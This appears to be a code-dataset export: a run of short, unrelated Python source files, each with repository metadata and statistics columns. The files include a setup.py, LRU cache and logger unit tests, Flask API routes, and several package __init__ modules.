FlaskUI(server='django').run()
| 31.4
| 67
| 0.783439
| 22
| 157
| 5.590909
| 0.727273
| 0.211382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152866
| 157
| 5
| 68
| 31.4
| 0.924812
| 0.541401
| 0
| 0
| 0
| 0
| 0.089552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
26b64ab1a8eae5553fb5dd8cecd25dfb8fad5bdc
| 1,517
|
py
|
Python
|
setup.py
|
nbigot/python-undoable-transaction
|
84802e512738b8f5823934b9095897ce7d245616
|
[
"MIT"
] | null | null | null |
setup.py
|
nbigot/python-undoable-transaction
|
84802e512738b8f5823934b9095897ce7d245616
|
[
"MIT"
] | null | null | null |
setup.py
|
nbigot/python-undoable-transaction
|
84802e512738b8f5823934b9095897ce7d245616
|
[
"MIT"
] | null | null | null |
from setuptools import setup
setup(
name='undoable_transaction',
version='0.1.0',
packages=['undoable_transaction'],
zip_safe=True,
author='Nicolas Bigot',
author_email='nicbigot@gmail.com',
description='Undoable transaction',
long_description='Undoable transaction',
license='MIT',
keywords=['undo', 'undoable', 'transaction'],
url='https://github.com/nbigot/python-undoable-transaction',
download_url='https://github.com/nbigot/python-undoable-transaction/archive/0.1.0.tar.gz',
platforms='any',
tests_require=[
'pytest>=2.5.0'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Database',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| 37
| 94
| 0.613711
| 152
| 1,517
| 6.078947
| 0.453947
| 0.22619
| 0.297619
| 0.225108
| 0.162338
| 0.103896
| 0.103896
| 0.103896
| 0
| 0
| 0
| 0.024138
| 0.235333
| 1,517
| 40
| 95
| 37.925
| 0.772414
| 0
| 0
| 0
| 0
| 0.025641
| 0.632169
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.025641
| 0
| 0.025641
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
26dc1b256cf85b3134007e48e7ff9225abcd17cc
| 117
|
py
|
Python
|
changelogs/custom/pypi/docutils.py
|
chris48s/changelogs
|
0cdb929ac4546c766cd7eef9ae4eb4baaa08f452
|
[
"MIT"
] | 54
|
2017-01-12T09:44:49.000Z
|
2022-02-01T18:15:07.000Z
|
changelogs/custom/pypi/docutils.py
|
chris48s/changelogs
|
0cdb929ac4546c766cd7eef9ae4eb4baaa08f452
|
[
"MIT"
] | 254
|
2016-12-23T12:53:52.000Z
|
2021-11-23T14:59:01.000Z
|
changelogs/custom/pypi/docutils.py
|
chris48s/changelogs
|
0cdb929ac4546c766cd7eef9ae4eb4baaa08f452
|
[
"MIT"
] | 26
|
2017-02-25T08:21:05.000Z
|
2022-01-10T15:46:24.000Z
|
def get_urls(*args, **kwargs):
return {
'http://docutils.sourceforge.net/RELEASE-NOTES.txt'
}, set()
| 23.4
| 59
| 0.606838
| 14
| 117
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205128
| 117
| 4
| 60
| 29.25
| 0.752688
| 0
| 0
| 0
| 0
| 0
| 0.418803
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0
| 0.25
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
|
0
| 5
|
26f17a9786f0dac24617595b4b16c518a328c27e
| 91
|
py
|
Python
|
matrix_registration/__init__.py
|
anonfloppa/matrix-registration
|
0d9c20854eb79c1dfc2ac27690b8e369111760ac
|
[
"MIT"
] | null | null | null |
matrix_registration/__init__.py
|
anonfloppa/matrix-registration
|
0d9c20854eb79c1dfc2ac27690b8e369111760ac
|
[
"MIT"
] | null | null | null |
matrix_registration/__init__.py
|
anonfloppa/matrix-registration
|
0d9c20854eb79c1dfc2ac27690b8e369111760ac
|
[
"MIT"
] | null | null | null |
from . import api
from . import config
from . import captcha
name = 'matrix_registration'
| 15.166667
| 28
| 0.758242
| 12
| 91
| 5.666667
| 0.666667
| 0.441176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175824
| 91
| 5
| 29
| 18.2
| 0.906667
| 0
| 0
| 0
| 0
| 0
| 0.208791
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
f81f1ca95b833c0bf8c23add715de8fc5611517b
| 1,903
|
py
|
Python
|
Tests/LRUCache_Test.py
|
andrew-bondarenko/LRUCache
|
e36046260a3eb8d328b55374d81966b996ee6e3b
|
[
"MIT"
] | null | null | null |
Tests/LRUCache_Test.py
|
andrew-bondarenko/LRUCache
|
e36046260a3eb8d328b55374d81966b996ee6e3b
|
[
"MIT"
] | null | null | null |
Tests/LRUCache_Test.py
|
andrew-bondarenko/LRUCache
|
e36046260a3eb8d328b55374d81966b996ee6e3b
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append('LRUCache')
from LRUCache import LRUCache
import unittest
class LRUCache_Test(unittest.TestCase):
def setUp(self):
self.lruCache = LRUCache()
def test_empty_cache(self):
self.assertEqual(self.lruCache.get(1), None, 'Should be None')
def test_length(self):
self.lruCache = LRUCache(2)
self.lruCache.put(1,1)
self.lruCache.put(2,2)
self.lruCache.put(3,3)
self.assertEqual(self.lruCache.get(1), None, 'Should be None')
def test_get(self):
self.lruCache.put(1,1)
self.assertEqual(self.lruCache.get(1), 1, 'Should be 1')
def test_eviction(self):
self.lruCache.put(1,1)
self.lruCache.put(2,2)
self.lruCache.put(3,3)
self.lruCache.put(4,4)
self.lruCache.put(5,5)
self.lruCache.put(6,6)
self.lruCache.put(7,7)
self.assertEqual(self.lruCache.get(1), None, 'Should be None')
def test_eviction_with_get(self):
self.lruCache.put(1,1)
self.lruCache.put(2,2)
self.lruCache.put(3,3)
self.lruCache.put(4,4)
self.lruCache.put(5,5)
self.lruCache.get(1)
self.lruCache.put(6,6)
self.lruCache.put(7,7)
self.assertEqual(self.lruCache.get(1), 1, 'Should be 1')
self.assertEqual(self.lruCache.get(2), None, 'Should be None')
def test_delete(self):
self.lruCache.put(1,1)
self.lruCache.put(2,2)
self.lruCache.delete(1)
self.assertEqual(self.lruCache.get(1), None, 'Should be None')
self.assertEqual(self.lruCache.get(2), 2, 'Should be 2')
def test_reset(self):
self.lruCache.put(1,1)
self.lruCache.reset()
self.assertEqual(self.lruCache.get(1), None, 'Should be None')
def tearDown(self):
self.lruCache = None
if __name__ == '__main__':
unittest.main()
| 29.276923
| 70
| 0.61587
| 275
| 1,903
| 4.192727
| 0.134545
| 0.374675
| 0.2732
| 0.210755
| 0.733738
| 0.733738
| 0.660017
| 0.65915
| 0.607112
| 0.607112
| 0
| 0.04158
| 0.241724
| 1,903
| 65
| 71
| 29.276923
| 0.75745
| 0
| 0
| 0.538462
| 0
| 0
| 0.069853
| 0
| 0
| 0
| 0
| 0
| 0.173077
| 1
| 0.173077
| false
| 0
| 0.057692
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f8b391d9ec6f333f49bd2309234babadae417cc9
| 349
|
py
|
Python
|
src/fbsrankings/query/seasons.py
|
mikee385/fbsrankings
|
2b50e26a302b53c21cd8f5c965943d6fbf0680a1
|
[
"MIT"
] | null | null | null |
src/fbsrankings/query/seasons.py
|
mikee385/fbsrankings
|
2b50e26a302b53c21cd8f5c965943d6fbf0680a1
|
[
"MIT"
] | null | null | null |
src/fbsrankings/query/seasons.py
|
mikee385/fbsrankings
|
2b50e26a302b53c21cd8f5c965943d6fbf0680a1
|
[
"MIT"
] | null | null | null |
from typing import List
from uuid import UUID
from dataclasses import dataclass
from fbsrankings.common import Query
@dataclass(frozen=True)
class SeasonResult:
id_: UUID
year: int
@dataclass(frozen=True)
class SeasonsResult:
seasons: List[SeasonResult]
@dataclass(frozen=True)
class SeasonsQuery(Query[SeasonsResult]):
pass
| 15.173913
| 41
| 0.767908
| 42
| 349
| 6.357143
| 0.5
| 0.168539
| 0.213483
| 0.269663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160458
| 349
| 22
| 42
| 15.863636
| 0.911263
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.071429
| 0.285714
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
f8c0906a59f5904626803d57a2e68ea8ffcef2ca
| 60
|
py
|
Python
|
source/__init__.py
|
mengwangk/myinvestor-toolkit
|
3dca9e1accfccf1583dcdbec80d1a0fe9dae2e81
|
[
"MIT"
] | 7
|
2019-10-13T18:58:33.000Z
|
2021-08-07T12:46:22.000Z
|
source/__init__.py
|
mengwangk/myinvestor-toolkit
|
3dca9e1accfccf1583dcdbec80d1a0fe9dae2e81
|
[
"MIT"
] | 7
|
2019-12-16T21:25:34.000Z
|
2022-02-10T00:11:22.000Z
|
source/__init__.py
|
mengwangk/myinvestor-toolkit
|
3dca9e1accfccf1583dcdbec80d1a0fe9dae2e81
|
[
"MIT"
] | 4
|
2020-02-01T11:23:51.000Z
|
2021-12-13T12:27:18.000Z
|
from .yahoo_finance import *
from .google_finance import *
| 15
| 29
| 0.783333
| 8
| 60
| 5.625
| 0.625
| 0.577778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 60
| 3
| 30
| 20
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
3e116ef636ed4358aec599acc482489252c99348
| 90
|
py
|
Python
|
amonguslobby/__init__.py
|
ismaeelakram/Mahjestic-Cogs
|
f0140c6aef2b5bef069cb59f76db058d05876541
|
[
"MIT"
] | 2
|
2020-12-06T10:27:28.000Z
|
2020-12-08T01:14:03.000Z
|
amonguslobby/__init__.py
|
IsmaeelAkram/Mahjestic-Cogs
|
f0140c6aef2b5bef069cb59f76db058d05876541
|
[
"MIT"
] | 1
|
2020-12-19T21:36:23.000Z
|
2020-12-19T21:36:23.000Z
|
amonguslobby/__init__.py
|
ismaeelakram/Mahjestic-Cogs
|
f0140c6aef2b5bef069cb59f76db058d05876541
|
[
"MIT"
] | 1
|
2022-03-03T19:40:22.000Z
|
2022-03-03T19:40:22.000Z
|
from .amonguslobby import AmongUsLobby
def setup(bot):
bot.add_cog(AmongUsLobby(bot))
| 22.5
| 38
| 0.777778
| 12
| 90
| 5.75
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122222
| 90
| 4
| 39
| 22.5
| 0.873418
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
3e38a813b18d539e135f699a12176f77598fef09
| 92
|
py
|
Python
|
app/proto/__init__.py
|
yilongzhu/schere-api
|
1fd7e4bb080a9aed7dc57ed57d9821d3034a67ca
|
[
"MIT"
] | null | null | null |
app/proto/__init__.py
|
yilongzhu/schere-api
|
1fd7e4bb080a9aed7dc57ed57d9821d3034a67ca
|
[
"MIT"
] | 1
|
2022-03-08T21:09:30.000Z
|
2022-03-08T21:09:30.000Z
|
app/proto/__init__.py
|
yilongzhu/schere-api
|
1fd7e4bb080a9aed7dc57ed57d9821d3034a67ca
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
bp = Blueprint('proto', __name__)
from app.proto import routes
| 18.4
| 33
| 0.782609
| 13
| 92
| 5.230769
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141304
| 92
| 5
| 34
| 18.4
| 0.860759
| 0
| 0
| 0
| 0
| 0
| 0.053763
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 5
|
3e43cf537dd4b414cb150df8442f11f60f8ef7af
| 33
|
py
|
Python
|
z42/z42/web/mysql/orm/__init__.py
|
jumploop/collection_python
|
f66f18dc5ae50fce95679e0f4aee5e28b2543432
|
[
"MIT"
] | null | null | null |
z42/z42/web/mysql/orm/__init__.py
|
jumploop/collection_python
|
f66f18dc5ae50fce95679e0f4aee5e28b2543432
|
[
"MIT"
] | null | null | null |
z42/z42/web/mysql/orm/__init__.py
|
jumploop/collection_python
|
f66f18dc5ae50fce95679e0f4aee5e28b2543432
|
[
"MIT"
] | null | null | null |
from model import Model, ModelMc
| 16.5
| 32
| 0.818182
| 5
| 33
| 5.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 33
| 1
| 33
| 33
| 0.964286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
3e72fd1b0b89ee0d5c298da1dd3657c2c0aa2281
| 4,633
|
py
|
Python
|
offpele/tests/test_utils.py
|
cescgina/peleffy
|
fc68116dc98050ed3c2c92270d8218565d099801
|
[
"MIT"
] | null | null | null |
offpele/tests/test_utils.py
|
cescgina/peleffy
|
fc68116dc98050ed3c2c92270d8218565d099801
|
[
"MIT"
] | null | null | null |
offpele/tests/test_utils.py
|
cescgina/peleffy
|
fc68116dc98050ed3c2c92270d8218565d099801
|
[
"MIT"
] | null | null | null |
"""
This module contains the tests to check some handy classes and functions
of offpele.
"""
import pytest
import io
from contextlib import redirect_stdout
from offpele.utils import Logger
class TestLogger(object):
def test_logger_levels(self):
"""
It checks the correct behaviour of the different log levels.
"""
def push_messages(log):
"""Pull some messages at different levels."""
log.debug('Debug message')
log.info('Info message')
log.warning('Warn message')
log.error('Error message')
log.critical('Critical message')
import logging
# Initiate logger
log = Logger()
# Try the default level (INFO)
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Info message\nWarn message\n' \
+ 'Error message\nCritical message\n', \
'Unexpected logger message at standard output'
# Try DEBUG level
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Try DEBUG level
log.set_level('DEBUG')
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Debug message\nInfo message\n'\
+ 'Warn message\nError message\nCritical message\n', \
'Unexpected logger message at standard output'
# Try INFO level
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Try INFO level
log.set_level('INFO')
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Info message\nWarn message\n' \
+ 'Error message\nCritical message\n', \
'Unexpected logger message at standard output'
# Try WARNING level
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Try WARNING level
log.set_level('WARNING')
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Warn message\nError message\n' \
+ 'Critical message\n', \
'Unexpected logger message at standard output'
# Try ERROR level
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Try ERROR level
log.set_level('ERROR')
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Error message\nCritical message\n', \
'Unexpected logger message at standard output'
# Try CRITICAL level
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Try CRITICAL level
log.set_level('CRITICAL')
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Critical message\n', \
'Unexpected logger message at standard output'
| 30.480263
| 72
| 0.564861
| 485
| 4,633
| 5.315464
| 0.160825
| 0.060512
| 0.040729
| 0.048875
| 0.730799
| 0.730799
| 0.730799
| 0.730799
| 0.730799
| 0.686967
| 0
| 0
| 0.361105
| 4,633
| 151
| 73
| 30.682119
| 0.870946
| 0.222102
| 0
| 0.647887
| 0
| 0
| 0.185395
| 0
| 0
| 0
| 0
| 0
| 0.084507
| 1
| 0.028169
| false
| 0
| 0.070423
| 0
| 0.112676
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
3e8073460466d3fcf5008e744f030df66bd4bc38
| 3,705
|
py
|
Python
|
relations/routes/api.py
|
arXiv/arxiv-external-links
|
a92e04fb4f9f50629e241de6d64e8aa8e2be6774
|
[
"MIT"
] | 6
|
2019-07-22T14:39:29.000Z
|
2021-11-05T12:24:36.000Z
|
relations/routes/api.py
|
arXiv/arxiv-external-links
|
a92e04fb4f9f50629e241de6d64e8aa8e2be6774
|
[
"MIT"
] | 24
|
2019-06-11T01:16:38.000Z
|
2021-06-02T00:18:51.000Z
|
relations/routes/api.py
|
arXiv/arxiv-external-links
|
a92e04fb4f9f50629e241de6d64e8aa8e2be6774
|
[
"MIT"
] | 5
|
2019-06-24T21:00:37.000Z
|
2021-11-05T12:24:29.000Z
|
"""Defines the HTTP routes and methods supported by the relations API."""
from flask import Blueprint, Response, request
from flask.json import jsonify
from .. import controllers
blueprint = Blueprint('api', __name__, url_prefix='/api')
@blueprint.route('/status', methods=['GET'])
def service_status() -> Response:
"""
Service status endpoint.
Returns ``200 OK`` if the service is up and ready to handle requests.
"""
response_data, status_code, headers = controllers.service_status(request.params)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
@blueprint.route('/<string:arxiv_id_str>v<int:arxiv_ver>/relations', methods=['POST'])
def create_new(arxiv_id_str: str, arxiv_ver: int) -> Response:
"""Create a new relation for an e-print."""
response_data, status_code, headers = controllers.create_new(arxiv_id_str,
arxiv_ver,
request.json)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
@blueprint.route('/<string:arxiv_id_str>v<int:arxiv_ver>/relations/<string:relation_id_str>', methods=['PUT'])
def supercede(arxiv_id_str: str, arxiv_ver: int, relation_id_str: str) -> Response:
"""Create a new relation for an e-print which supersedes an existing relation."""
response_data, status_code, headers = controllers.supercede(arxiv_id_str,
arxiv_ver,
relation_id_str,
request.json)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
@blueprint.route('/<string:arxiv_id_str>v<int:arxiv_ver>/relations/<string:relation_id_str>', methods=['DELETE'])
def suppress(arxiv_id_str: str, arxiv_ver: int, relation_id_str: str) -> Response:
"""Create a new relation for an e-print which supresses an existing relation."""
response_data, status_code, headers = controllers.suppress(arxiv_id_str,
arxiv_ver,
relation_id_str,
request.json)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
@blueprint.route('/<string:arxiv_id_str>v<int:arxiv_ver>', methods=['GET'])
def get_relations(arxiv_id_str: str, arxiv_ver: int) -> Response:
"""Get all active (not suppressed or superseded) relations for an e-print."""
response_data, status_code, headers = \
controllers.retrieve(arxiv_id_str, arxiv_ver, active_only=True)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
@blueprint.route('/<string:arxiv_id_str>v<int:arxiv_ver>/log', methods=['GET'])
def get_events(arxiv_id_str: str, arxiv_ver: int) -> Response:
"""Get the complete set of relation events (including suppressed and superseded)."""
response_data, status_code, headers = \
controllers.retrieve(arxiv_id_str, arxiv_ver, active_only=False)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
| 44.107143
| 113
| 0.642915
| 432
| 3,705
| 5.282407
| 0.194444
| 0.046012
| 0.065732
| 0.057844
| 0.746713
| 0.730938
| 0.713409
| 0.713409
| 0.702892
| 0.609991
| 0
| 0.001093
| 0.259109
| 3,705
| 83
| 114
| 44.638554
| 0.830237
| 0.135762
| 0
| 0.607143
| 0
| 0
| 0.09835
| 0.086929
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.053571
| 0
| 0.267857
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
e4219dd461d70c48509c267b09b2db29c496898c
| 48
|
py
|
Python
|
hello_world.py
|
FJLEspinha/JavaPracticeHacktoberfest
|
737ca4e8e74abd575f233ed0c8462c4805e7f9da
|
[
"Apache-2.0"
] | 11
|
2016-10-27T22:01:11.000Z
|
2021-10-05T12:12:45.000Z
|
hello_world.py
|
FJLEspinha/JavaPracticeHacktoberfest
|
737ca4e8e74abd575f233ed0c8462c4805e7f9da
|
[
"Apache-2.0"
] | 20
|
2016-10-25T07:48:36.000Z
|
2021-10-10T03:43:57.000Z
|
hello_world.py
|
FJLEspinha/JavaPracticeHacktoberfest
|
737ca4e8e74abd575f233ed0c8462c4805e7f9da
|
[
"Apache-2.0"
] | 208
|
2016-10-25T08:41:36.000Z
|
2021-11-01T05:06:49.000Z
|
hello_world = 'Hello World!'
print(hello_world)
| 16
| 28
| 0.770833
| 7
| 48
| 5
| 0.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104167
| 48
| 2
| 29
| 24
| 0.813953
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
e43afc8c8886d608d333366b72823a5aee8cb990
| 28
|
py
|
Python
|
baekjoon/python/register_7287.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
baekjoon/python/register_7287.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
baekjoon/python/register_7287.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
print(58)
print("yskang")
| 9.333333
| 16
| 0.642857
| 4
| 28
| 4.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0.142857
| 28
| 2
| 17
| 14
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
e4698a4a05f90a1a5325b5f555c8b37caf301a12
| 119
|
py
|
Python
|
src/geventhttpclient/__init__.py
|
edgeware/geventhttpclient
|
4031065380fab8879faa184c813e6a692b947ca8
|
[
"MIT"
] | null | null | null |
src/geventhttpclient/__init__.py
|
edgeware/geventhttpclient
|
4031065380fab8879faa184c813e6a692b947ca8
|
[
"MIT"
] | null | null | null |
src/geventhttpclient/__init__.py
|
edgeware/geventhttpclient
|
4031065380fab8879faa184c813e6a692b947ca8
|
[
"MIT"
] | 1
|
2021-04-07T11:07:11.000Z
|
2021-04-07T11:07:11.000Z
|
# package
__version__ = "1.0a"
from geventhttpclient.client import HTTPClient
from geventhttpclient.url import URL
| 13.222222
| 46
| 0.798319
| 14
| 119
| 6.5
| 0.714286
| 0.43956
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0.142857
| 119
| 8
| 47
| 14.875
| 0.872549
| 0.058824
| 0
| 0
| 0
| 0
| 0.037037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
902e1b61b8d7e6efd51e726fcc243bfcad6a63cd
| 30
|
py
|
Python
|
sonaion_analysis/DataObject.py
|
Sonaion/py-sonaion-analysis
|
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
|
[
"BSD-3-Clause"
] | 1
|
2021-10-15T06:58:56.000Z
|
2021-10-15T06:58:56.000Z
|
sonaion_analysis/DataObject.py
|
Sonaion/py-sonaion-analysis
|
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
|
[
"BSD-3-Clause"
] | null | null | null |
sonaion_analysis/DataObject.py
|
Sonaion/py-sonaion-analysis
|
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
|
[
"BSD-3-Clause"
] | null | null | null |
class DataAnalysis:
pass
